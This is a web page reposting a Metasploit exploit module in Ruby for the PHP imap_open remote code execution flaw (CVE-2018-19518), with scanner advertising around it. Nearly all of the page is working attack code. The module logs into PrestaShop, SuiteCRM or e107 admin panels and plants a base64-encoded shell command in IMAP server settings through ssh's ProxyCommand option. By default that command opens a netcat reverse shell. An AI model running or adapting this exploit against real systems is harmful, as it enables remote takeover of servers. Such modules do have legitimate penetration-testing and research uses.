php imap_open remote code execution (metasploit)

▸▸▸ Exploit & Vulnerability >>   remote exploit & linux vulnerability




Online Vulnerability Scanner Tools
php imap_open remote code execution (metasploit) Code Code... 
				
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'            => 'php imap_open Remote Code Execution',
      'Description'     => %q{
        The imap_open function within php, if called without the /norsh flag, will attempt to preauthenticate an
        IMAP session.  On Debian based systems, including Ubuntu, rsh is mapped to the ssh binary.  Ssh's ProxyCommand
        option can be passed from imap_open to execute arbitrary commands.
        While many custom applications may use imap_open, this exploit works against the following applications:
        e107 v2, prestashop, SuiteCRM, as well as Custom, which simply prints the exploit strings for use.
        Prestashop exploitation requires the admin URI, and administrator credentials.
        suiteCRM/e107/hostcms require administrator credentials.
      },
      'Author' =>
        [
          'Anton Lopanitsyn', # Vulnerability discovery and PoC
          'Twoster', # Vulnerability discovery and PoC
          'h00die' # Metasploit Module
        ],
      'License'         => MSF_LICENSE,
      'References'      =>
        [
          [ 'URL', 'https://web.archive.org/web/20181118213536/https://antichat.com/threads/463395' ],
          [ 'URL', 'https://github.com/Bo0oM/PHP_imap_open_exploit' ],
          [ 'EDB', '45865'],
          [ 'URL', 'https://bugs.php.net/bug.php?id=76428'],
          [ 'CVE', '2018-19518']
        ],
      'Privileged'  => false,
      'Platform'  => [ 'unix' ],
      'Arch'  => ARCH_CMD,
      'Targets' =>
        [
          [ 'prestashop', {} ],
          [ 'suitecrm', {}],
          [ 'e107v2', {'WfsDelay' => 90}], # may need to wait for cron
          [ 'custom', {'WfsDelay' => 300}]
        ],
      'PrependFork' => true,
      'DefaultOptions' =>
        {
          'PAYLOAD' => 'cmd/unix/reverse_netcat',
          'WfsDelay' => 120
        },
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Oct 23 2018'))

    register_options(
      [
        OptString.new('TARGETURI', [ true, "Base directory path", '/admin2769gx8k3']),
        OptString.new('USERNAME', [ false, "Username to authenticate with", '']),
        OptString.new('PASSWORD', [ false, "Password to authenticate with", ''])
      ])
  end

  def check
   if target.name =~ /prestashop/
      uri = normalize_uri(target_uri.path)
      res = send_request_cgi({'uri' => uri})
      if res && (res.code == 301 || res.code == 302)
       return CheckCode::Detected
      end
    elsif target.name =~ /suitecrm/
      #login page GET /index.php?action=Login&module=Users
      vprint_status('Loading login page')
      res = send_request_cgi(
        'uri' => normalize_uri(target_uri.path, 'index.php'),
        'vars_get' => {
          'action' => 'Login',
          'module' => 'Users'
        }
      )
      unless res
        print_error('Error loading site.  Check options.')
        return
      end

      if res.code = 200
        return CheckCode::Detected
      end
   end
   CheckCode::Safe
  end

  def command(spaces='$IFS$()')
    #payload is base64 encoded, and stuffed into the SSH option.
    enc_payload = Rex::Text.encode_base64(payload.encoded)
    command = "-oProxyCommand=`echo #{enc_payload}|base64 -d|bash`"
    #final payload can not contain spaces, however $IFS$() will return the space we require
    command.gsub!(' ', spaces)
  end

  def exploit
    if target.name =~ /prestashop/
      uri = normalize_uri(target_uri.path)
      res = send_request_cgi({'uri' => uri})
      if res && res.code != 301
        print_error('Admin redirect not found, check URI.  Should be something similar to /admin2769gx8k3')
        return
      end

      #There are a bunch of redirects that happen, so we automate going through them to get to the login page.
      while res.code == 301 || res.code == 302
        cookie = res.get_cookies
        uri = res.headers['Location']
        vprint_status("Redirected to #{uri}")
        res = send_request_cgi({'uri' => uri})
      end

      #Tokens are generated for each URL or sub-component, we need valid ones!
      /.*token=(?<token>\w{32})/ =~ uri
      /id="redirect" value="(?<redirect>.*)"\/>/ =~ res.body
      cookie = res.get_cookies

      unless token && redirect
        print_error('Unable to find token and redirect URL, check options.')
        return
      end

      vprint_status("Token: #{token} and Login Redirect: #{redirect}")
      print_status("Logging in with #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
      res = send_request_cgi(
        'method' => 'POST',
        'uri'    => normalize_uri(target_uri.path, 'index.php'),
        'cookie' => cookie,
        'vars_post' => {
          'ajax' => 1,
          'token' => '',
          'controller' => 'AdminLogin',
          'submitLogin' => '1',
          'passwd' => datastore['PASSWORD'],
          'email' => datastore['USERNAME'],
          'redirect' => redirect
        },
        'vars_get' => {
          'rand' => '1542582364810' #not sure if this will hold true forever, I didn't see where it is being generated
        }
      )
      if res && res.body.include?('Invalid password')
        print_error('Invalid Login')
        return
      end
      vprint_status("Login JSON Response: #{res.body}")
      uri = JSON.parse(res.body)['redirect']
      cookie = res.get_cookies
      print_good('Login Success, loading admin dashboard to pull tokens')
      res = send_request_cgi({'uri' => uri, 'cookie' => cookie})

      /AdminCustomerThreads&token=(?<token>\w{32})/ =~ res.body
      vprint_status("Customer Threads Token: #{token}")
      res = send_request_cgi({
        'uri' => normalize_uri(target_uri.path, 'index.php'),
        'cookie' => cookie,
        'vars_get' => {
          'controller' => 'AdminCustomerThreads',
          'token' => token
        }
      })

      /form method="post" action="index\.php\?controller=AdminCustomerThreads&token=(?<token>\w{32})/ =~ res.body
      print_good("Sending Payload with Final Token: #{token}")
      data = Rex::MIME::Message.new
      data.add_part('1', nil, nil, 'form-data; name="PS_CUSTOMER_SERVICE_FILE_UPLOAD"')
      data.add_part("Dear Customer,\n\nRegards,\nCustomer service", nil, nil, 'form-data; name="PS_CUSTOMER_SERVICE_SIGNATURE_1"')
      data.add_part("x #{command}}", nil, nil, 'form-data; name="PS_SAV_IMAP_URL"')
      data.add_part('143', nil, nil, 'form-data; name="PS_SAV_IMAP_PORT"')
      data.add_part(Rex::Text.rand_text_alphanumeric(8), nil, nil, 'form-data; name="PS_SAV_IMAP_USER"')
      data.add_part(Rex::Text.rand_text_alphanumeric(8), nil, nil, 'form-data; name="PS_SAV_IMAP_PWD"')
      data.add_part('0', nil, nil, 'form-data; name="PS_SAV_IMAP_DELETE_MSG"')
      data.add_part('0', nil, nil, 'form-data; name="PS_SAV_IMAP_CREATE_THREADS"')
      data.add_part('0', nil, nil, 'form-data; name="PS_SAV_IMAP_OPT_POP3"')
      data.add_part('0', nil, nil, 'form-data; name="PS_SAV_IMAP_OPT_NORSH"')
      data.add_part('0', nil, nil, 'form-data; name="PS_SAV_IMAP_OPT_SSL"')
      data.add_part('0', nil, nil, 'form-data; name="PS_SAV_IMAP_OPT_VALIDATE-CERT"')
      data.add_part('0', nil, nil, 'form-data; name="PS_SAV_IMAP_OPT_NOVALIDATE-CERT"')
      data.add_part('0', nil, nil, 'form-data; name="PS_SAV_IMAP_OPT_TLS"')
      data.add_part('0', nil, nil, 'form-data; name="PS_SAV_IMAP_OPT_NOTLS"')
      data.add_part('', nil, nil, 'form-data; name="submitOptionscustomer_thread"')

      send_request_cgi(
        'method' => 'POST',
        'uri'    => normalize_uri(target_uri.path, 'index.php'),
        'ctype'  => "multipart/form-data; boundary=#{data.bound}",
        'data'   => data.to_s,
        'cookie' => cookie,
        'vars_get' => {
          'controller' => 'AdminCustomerThreads',
          'token' => token
        }
      )
      print_status('IMAP server change left on server, manual revert required.')

      if res && res.body.include?('imap Is Not Installed On This Server')
        print_error('PHP IMAP mod not installed/enabled ')
      end
    elsif target.name =~ /suitecrm/
      #login page GET /index.php?action=Login&module=Users
      vprint_status('Loading login page')
      res = send_request_cgi(
        'uri' => normalize_uri(target_uri.path, 'index.php'),
        'vars_get' => {
          'action' => 'Login',
          'module' => 'Users'
        }
      )
      unless res
        print_error('Error loading site.  Check options.')
        return
      end

      if res.code = 200
        cookie = res.get_cookies
      else
        print_error("HTTP code #{res.code} found, check options.")
        return
      end

      vprint_status("Logging in as #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
      res = send_request_cgi(
        'method' => 'POST',
        'uri' => normalize_uri(target_uri.path, 'index.php'),
        'cookie' => cookie,
        'vars_post' => {
          'module' => 'Users',
          'action' => 'Authenticate',
          'return_module' => 'Users',
          'return_action' => 'Login',
          'cant_login' => '',
          'login_module' => '',
          'login_action' => '',
          'login_record' => '',
          'login_token' => '',
          'login_oauth_token' => '',
          'login_mobile' => '',
          'user_name' => datastore['USERNAME'],
          'username_password' => datastore['PASSWORD'],
          'Login' => 'Log+In'
        }
      )
      unless res
        print_error('Error loading site.  Check options.')
        return
      end

      if res.code = 302
        cookie = res.get_cookies
        print_good('Login Success')
      else
        print_error('Failed Login, check options.')
      end

      #load the email settings page to get the group_id
      vprint_status('Loading InboundEmail page')
      res = send_request_cgi(
        'uri' => normalize_uri(target_uri.path, 'index.php'),
        'cookie' => cookie,
        'vars_get' => {
          'module' => 'InboundEmail',
          'action' => 'EditView'
        }
      )

      unless res
        print_error('Error loading site.')
        return
      end

      /"group_id" value="(?<group_id>\w{8}-\w{4}-\w{4}-\w{4}-\w{12})">/ =~ res.body

      unless group_id
        print_error('Could not identify group_id from form page')
        return
      end

      print_good("Sending payload with group_id #{group_id}")

      referer = "http://#{datastore['RHOST']}#{normalize_uri(target_uri.path, 'index.php')}?module=InboundEmail&action=EditView"
      res = send_request_cgi(
        'method' => 'POST',
        'uri' => normalize_uri(target_uri.path, 'index.php'),
        'cookie' => cookie,
        #required to prevent CSRF protection from triggering
        'headers' => { 'Referer' => referer},
        'vars_post' => {
          'module' => 'InboundEmail',
          'record' => '',
          'origin_id' => '',
          'isDuplicate' => 'false',
          'action' => 'Save',
          'group_id' => group_id,
          'return_module' => '',
          'return_action' => '',
          'return_id' => '',
          'personal' => '',
          'searchField' => '',
          'mailbox_type' => '',
          'button' => '  Save  ',
          'name' => Rex::Text.rand_text_alphanumeric(8),
          'status' => 'Active',
          'server_url' => "x #{command}}",
          'email_user' => Rex::Text.rand_text_alphanumeric(8),
          'protocol' => 'imap',
          'email_password' => Rex::Text.rand_text_alphanumeric(8),
          'port' => '143',
          'mailbox' => 'INBOX',
          'trashFolder' => 'TRASH',
          'sentFolder' => '',
          'from_name' => Rex::Text.rand_text_alphanumeric(8),
          'is_auto_import' => 'on',
          'from_addr' => "#{Rex::Text.rand_text_alphanumeric(8)}@#{Rex::Text.rand_text_alphanumeric(8)}.org",
          'reply_to_name' => '',
          'distrib_method' => 'AOPDefault',
          'distribution_user_name' => '',
          'distribution_user_id' => '',
          'distribution_options[0]' => 'all',
          'distribution_options[1]' => '',
          'distribution_options[2]' => '',
          'create_case_template_id' => '',
          'reply_to_addr' => '',
          'template_id' => '',
          'filter_domain' => '',
          'email_num_autoreplies_24_hours' => '10',
          'leaveMessagesOnMailServer' => '1'
        }
      )
      if res && res.code == 200
        print_error('Triggered CSRF protection, may try exploitation manually.')
      end
      print_status('IMAP server config left on server, manual removal required.')
    elsif target.name =~ /e107v2/
      # e107 has an encoder which prevents $IFS$() from being used as $ = &#036;
      # \t also became /t, however "\t" does seem to work.

      # e107 also uses a cron job to check bounce jobs, which may not be active.
      # either cron can be disabled, or bounce checks disabled, so we try to
      # kick the process manually, however if it doesn't work we'll hope
      # cron is running and we get a call back anyways.

      vprint_status("Logging in as #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
      res = send_request_cgi(
        'method' => 'POST',
        'uri' => normalize_uri(target_uri.path, 'e107_admin', 'admin.php'),
        'vars_post' => {
          'authname' => datastore['USERNAME'],
          'authpass' => datastore['PASSWORD'],
          'authsubmit' => 'Log In'
      })
      unless res
        print_error('Error loading site.  Check options.')
        return
      end

      if res.code == 302
        cookie = res.get_cookies
        print_good('Login Success')
      else
        print_error('Failed Login, check options.')
      end


      vprint_status('Checking if Cron is enabled for triggering')
      res = send_request_cgi(
        'uri' => normalize_uri(target_uri.path, 'e107_admin', 'cron.php'),
        'cookie' => cookie
      )
      unless res
        print_error('Error loading site.  Check options.')
        return
      end
      if res.body.include? 'Status: <b>Disabled</b>'
        print_error('Cron disabled, unexploitable.')
        return
      end

      print_good('Storing payload in mail settings')

      # the imap/pop field is hard to find. Check Users > Mail
      # then check "Bounced emails - Processing method" and set it to "Mail account"
      send_request_cgi(
        'method' => 'POST',
        'uri' => normalize_uri(target_uri.path, 'e107_admin', 'mailout.php'),
        'cookie' => cookie,
        'vars_get' => {
          'mode' => 'prefs',
          'action' => 'prefs'
        },
        'vars_post' => {
          'testaddress' => 'none@none.com',
          'testtemplate' => 'textonly',
          'bulkmailer' => 'smtp',
          'smtp_server' => '1.1.1.1',
          'smtp_username' => 'username',
          'smtp_password' => 'password',
          'smtp_port' => '25',
          'smtp_options' => '',
          'smtp_keepalive' => '0',
          'smtp_useVERP' => '0',
          'mail_sendstyle' => 'texthtml',
          'mail_pause' => '3',
          'mail_pausetime' => '4',
          'mail_workpertick' => '5',
          'mail_log_option' => '0',
          'mail_bounce' => 'mail',
          'mail_bounce_email2' => '',
          'mail_bounce_email' => "#{Rex::Text.rand_text_alphanumeric(8)}@#{Rex::Text.rand_text_alphanumeric(8)}.org",
          'mail_bounce_pop3' => "x #{command("\t")}}",
          'mail_bounce_user' => Rex::Text.rand_text_alphanumeric(8),
          'mail_bounce_pass' => Rex::Text.rand_text_alphanumeric(8),
          'mail_bounce_type' => 'imap',
          'mail_bounce_auto' => '1',
          'updateprefs' => 'Save Changes'
      })


      vprint_status('Loading cron page to execute job manually')
      res =  send_request_cgi(
        'uri' => normalize_uri(target_uri.path, 'e107_admin', 'cron.php'),
        'cookie' => cookie
      )

      unless res
        print_error('Error loading site.  Check options.')
        return
      end

      if /name='e-token' value='(?<etoken>\w{32})'/ =~ res.body && /_system::procEmailBounce.+?cron_execute\[(?<cron_id>\d)\]/m =~ res.body
        print_good("Triggering manual run of mail bounch check cron to execute payload with cron id #{cron_id} and etoken #{etoken}")
        # The post request has several duplicate columns, however all were not required.  Left them commented for documentation purposes
        send_request_cgi(
          'method' => 'POST',
          'uri' => normalize_uri(target_uri.path, 'e107_admin', 'cron.php'),
          'cookie' => cookie,
          'vars_post' => {
            'e-token' => etoken,
            #'e-columns[]' => 'cron_category',
            'e-columns[]' => 'cron_name',
            #'e-columns[]' => 'cron_description',
            #'e-columns[]' => 'cron_function',
            #'e-columns[]' => 'cron_tab',
            #'e-columns[]' => 'cron_lastrun',
            #'e-columns[]' => 'cron_active',
            "cron_execute[#{cron_id}]" => '1',
            'etrigger_batch' => ''
        })

      else
        print_error('e-token not found, required for manual exploitation.  Wait 60sec, cron may still trigger.')
      end

      print_status('IMAP server config left on server, manual removal required.')
    elsif target.name =~ /custom/
      print_status('Listener started for 300 seconds')
      print_good("POST request connection string: x #{command}}")
      # URI.encode leaves + as + since that's a space encoded.  So we manually change it.
      print_good("GET request connection string: #{URI.encode("x " + command + "}").sub! '+', '%2B'}")
    end
  end
end

Php imap_open remote code execution (metasploit) Vulnerability / Exploit Source : Php imap_open remote code execution (metasploit)



Last Vulnerability or Exploits

Developers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Easy integrations and simple setup help you start scanning in just some minutes
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Discover posible vulnerabilities before GO LIVE with your project
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Manage your reports without any restriction

Business Owners

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Obtain a quick overview of your website's security information
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Do an audit to find and close the high risk issues before having a real damage and increase the costs
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Verify if your developers served you a vulnerable project or not before you are paying
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Run periodically scan for vulnerabilities and get info when new issues are present.

Penetration Testers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Quickly checking and discover issues to your clients
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Bypass your network restrictions and scan from our IP for relevant results
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Create credible proved the real risk of vulnerabilities

Everybody

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check If you have an website and want you check the security of site you can use our products
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Scan your website from any device with internet connection

Tusted by
clients

 
  Our Cyber Security Web Test application uses Cookies. By using our Cyber Security Web Test application, you are agree that we will use this information. I Accept.